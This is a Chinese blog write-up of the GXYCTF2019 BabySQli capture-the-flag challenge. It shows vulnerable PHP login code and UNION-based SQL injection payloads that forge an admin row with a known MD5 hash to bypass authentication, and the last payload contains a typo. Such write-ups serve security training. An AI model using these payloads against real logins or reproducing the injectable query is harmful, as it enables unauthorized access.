[GXYCTF2019]BabySQli

最新推荐文章于 2024-02-05 14:00:03 发布
最新推荐文章于 2024-02-05 14:00:03 发布
阅读量566 收藏
点赞数 1
文章标签: 安全 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/125242847
版权

进来是一个简单的登录框

这题不是一个正常的sql注入题目,而是要考察mysql联合查询的特性

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

联合查询的特性,参考wp

 所以尝试输

1' union select 'admin',1,2#

123

通过回显wrong user!找到user的位置是在中间

1' union select 1,'admin',3#

123

回显wrong pass!,最后一步因为我们登录的密码是123,所以这里传入的必须是123的md5值

202cb962ac59075b964b07152d234b70

1' uinion select 1,'admin','202cb962ac59075b964b07152d234b70'#

123

传入后就返回flag

白塔河冲浪手
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 599
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 887
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
[GXYCTF2019]BabySQli1
qq_48932191的博客
01-25 388
第一次接触这种题,属实是摸不着头脑,因为正常思路目的是爆库在库里找到flag字段,这道题不是这么想的,而是把目标放在了绕过原有的密码成功登入。尝试报错注入时发现过滤了圆括号,网上搜索似乎也没找到能绕过使用圆括号的方法,那么按以往爆库爆表爆字段的方法似乎无法使用了。根据经验这里猜测第三列存放的是账号对应的密码,而从sql库中获取密码后就会与我们输入的pw作对比,如果相等则成功登入。在响应报文找到一段注释,解码后发现是这样的,数据库根据我们输入的用户名查找三列信息。
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 863
主要是一个buuctf题目的解题过程,大家可以参考一下
[GXYCTF2019]BabySQli 1
qq_43618536的博客
07-03 1159
BUUCTF的[GXYCTF2019]BabySQli 1
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
[GXYCTF2019]BabySQli 1(详解)
A86445的博客
10-16 165
e10adc3949ba59abbe56e057f20f883e为md5加密后的密码,原因是在开发过程中为了更好的保护密码。到这里有点束手无策,上网看了一下大6们的解题思路豁然开朗,以下是大佬提供的源代码。无回显,爆出字段为3,暂时猜测为 id,username,password。经过一系列测试下来发现过滤了,括号,or ,|,=发现有一处逻辑漏洞在如下。
sql联合注入伪造数据之[GXYCTF2019]BabySQli1
qq_58970968的博客
04-17 647
各种常规注入都不行,但是在扫描之后 发现有东西,base解密之后还是没啥用: 知识点 在使用联合注入时,如果你查询的数据不存在,那么就会生成一个内容为null的虚拟数据,也就是说在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。所以这时我们就可以在注入时添加我们需要的信息来完成我们的目的。 参考:[GXYCTF2019]BabySQli1wp_冷血小白的博客-CSDN博​​​​​​ 构造: name=1' union select 0,'admin','81dc9bdb52d...
[GXYCTF 2019]BabySqli
m0_70819573的博客
03-23 331
2.此时可以利用sqli的特性,当查询一个不存在的表时会创建一个虚拟的表,且当查询原题源码时发现它会将pwMD5加密与库中数据比较,在sqli中,数据库密码一般以MD5加密或明文存放。过滤了(),database(),无法进行爆库,所以只能想是否存在admin用户,发现回显wrong pass.1.打开环境,显然是sql注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值